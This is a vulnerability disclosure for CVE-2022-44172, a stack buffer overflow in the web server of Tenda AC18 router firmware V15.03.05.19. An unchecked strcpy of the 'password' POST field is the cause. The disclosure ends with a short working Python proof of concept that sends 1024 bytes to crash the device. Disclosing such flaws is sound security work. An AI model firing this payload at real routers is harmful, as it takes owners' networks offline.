CVE-2022-44172: IoT_vuln/Tenda_AC18_V15.03.05.19_Vuln_password.md at main · RobinWang825/IoT_vuln

Permalink

Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product

1. product information: https://www.tenda.com.cn/
2. firmware download: https://www.tenda.com.cn/download/detail-2683.html

Affected version

V15.03.05.19

Vulnerability

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the R7WebsSecurityHandler function.

This function strcpy accepts the POST parameter password, does not verify its length, and copies it directly to a local variable on the stack, causing a stack overflow. This vulnerability allows attackers to cause a Denial of Service (DoS).

PoC

Poc of Denial of Service(DoS)

import requests pl = b"A"*0x400 data = { b"password": pl } res = requests.post("http://192.168.0.1/goform/helloworld", data=data) print(res.content)